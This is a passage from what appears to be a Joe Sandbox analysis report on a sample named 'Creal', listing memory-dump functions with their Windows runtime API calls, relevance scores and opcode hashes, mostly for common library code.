                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3251591375-0
                                                                                                                                                                                                                                                        • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                                        • Instruction ID: 13ca7f3b7e9f453d7bdc29cee3990acb35265787cc281f752ee39ef04d2a9931
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4314825E6C14381FA64FF69EA213FD26919F69384F445037D90ECB6E7DE2CB824CA40
                                                                                                                                                                                                                                                        Function 00007FF6D9259A30 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                                                                                                        • Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                                                        • Instruction ID: da9f16780d741f2e59ac375949935e928ad5b9b6629476bfa3d53f424471fd5b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A7D09218F3C70652FF983F705E9907C12656F88B01F54247EC80B86797ED2CA8698390
                                                                                                                                                                                                                                                        Function 00007FF6D925013C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                                        • Instruction ID: cc327ae4641572ae9d2db0d00580a935136659c34b487b994e853c9dda6b292e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A6512621B6924186FBA89E259E0067E6691BF85BB4F188736DD6DC37CDCE3CE4218701
                                                                                                                                                                                                                                                        Function 00007FF6D925C134 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2976181284-0
                                                                                                                                                                                                                                                        • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                                        • Instruction ID: 3dab6708cd9e055f0e70409c844e67654d4fc403a7336758c641b5115c36c037
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AF110421728A8181EA60DF25BA0407DA361AB41FF0F544332EE7D8BBE8DE3CD0608700
                                                                                                                                                                                                                                                        Function 00007FF6D9255924 Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D9255839), ref: 00007FF6D9255957
                                                                                                                                                                                                                                                        • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D9255839), ref: 00007FF6D925596D
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1707611234-0
                                                                                                                                                                                                                                                        • Opcode ID: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
                                                                                                                                                                                                                                                        • Instruction ID: a0eff770567124c8f70ae36c21db0a050439004df88d9ab90ab3101f30fc062a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 10118C32A2C64282FB948F54A55157EB7A0FB85771F50023BFA99C19ECEF2CD024DB40
                                                                                                                                                                                                                                                        Function 00007FF6D925A948 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(?,?,?,00007FF6D9262D22,?,?,?,00007FF6D9262D5F,?,?,00000000,00007FF6D9263225,?,?,?,00007FF6D9263157), ref: 00007FF6D925A95E
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF6D9262D22,?,?,?,00007FF6D9262D5F,?,?,00000000,00007FF6D9263225,?,?,?,00007FF6D9263157), ref: 00007FF6D925A968
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 485612231-0
                                                                                                                                                                                                                                                        • Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                                        • Instruction ID: 024c3c9abccb8f6183b5ba29708f49af185c4575b9eaea928a1e18f19c3c61bd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 38E08C10F3D20242FF486FF2AA4613C12506F88B40F444037C80DC22E9EE2C68B18310
                                                                                                                                                                                                                                                        Function 00007FF6D925AB58 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CloseHandle.KERNELBASE(?,?,?,00007FF6D925A9D5,?,?,00000000,00007FF6D925AA8A), ref: 00007FF6D925ABC6
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF6D925A9D5,?,?,00000000,00007FF6D925AA8A), ref: 00007FF6D925ABD0
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 918212764-0
                                                                                                                                                                                                                                                        • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                                        • Instruction ID: 0223abdaf3aec45d5b638ba39de0b3a780afcbdcce0d4ba000a3e695e9bbde0f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A0219321F3C68241FAE49F61A69537D16929F947A0F48423BDA2EC77D9CEACA4618340
                                                                                                                                                                                                                                                        Function 00007FF6D925BEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                                        • Instruction ID: a24c76c9d210eac199df107db088feb5b8768afebe37028d1afa97fa095e69bf
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B741C23292864187FAB48F29AA4127D73A0EB55B91F140136EB8EC36D9CF2CE412CB51
                                                                                                                                                                                                                                                        Function 00007FF6D9247F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _fread_nolock
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 840049012-0
                                                                                                                                                                                                                                                        • Opcode ID: 0d9b876d10d805dff503d874c4ea45c5a09dbb383c6c45e0b037d67d7559761f
                                                                                                                                                                                                                                                        • Instruction ID: 6e7a3ff0c2168c72e4910b1b475e8b39f445a6889bea59c0bcb61fc23f1936c9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d9b876d10d805dff503d874c4ea45c5a09dbb383c6c45e0b037d67d7559761f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4221C921B3965146FE509F226A043BE9651BF59BC4F8C5432EE0D8B78ADE7DE051CB00
                                                                                                                                                                                                                                                        Function 00007FF6D925B93C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                                                        • Instruction ID: dd1eb2b37bf97c06db5fa5280ff32fba35232e393abcacaf9c40f1a97c1755ad
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D531B332A3860285F791AF559A4137C7AA0BF81BA0F410137E95D833DACF7CE8618711
                                                                                                                                                                                                                                                        Function 00007FF6D9259961 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3947729631-0
                                                                                                                                                                                                                                                        • Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                                        • Instruction ID: 0ff21f1e3e976f0bdfcde6583d2841fa6212c9a6f68a020f4e0a4d59eb8df254
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2218D7AA2474589FBA49F68C4802BC37B0EB04718F840637D75D86BC9DF38E554C780
                                                                                                                                                                                                                                                        Function 00007FF6D9255F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                        • Instruction ID: c2b7999d4cccfb39bdc9cfdfb841ee656dbdd475e057806694eec99b484c49de
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6211A531A3C64282FAE09F91A60167DA264BF95B84F444433EA8DD7ADECF3CE4205700
                                                                                                                                                                                                                                                        Function 00007FF6D9266354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                                        • Instruction ID: c279b833e2fad2d16ca1bdbb0932a93e1c676fb368c78f3ac46b05b4e9485e76
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 53216532628A8186FB618F18D54037E76A0FB84F54F644239EA5DC7AD9DF3DD425CB40
                                                                                                                                                                                                                                                        Function 00007FF6D92503BC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                        • Instruction ID: e0081ba9437f14867cdb11604b16befe59519085dad80cfa8433d71979667dba
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3018821A6874581F944DF525E011BDA695BF95FE0F484632DE5C97BDECE3CE8258300
                                                                                                                                                                                                                                                        Function 00007FF6D925D5FC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(?,?,?,00007FF6D9250C90,?,?,?,00007FF6D92522FA,?,?,?,?,?,00007FF6D9253AE9), ref: 00007FF6D925D63A
                                                                                                                                                                                                                                                        Memory Dump Source
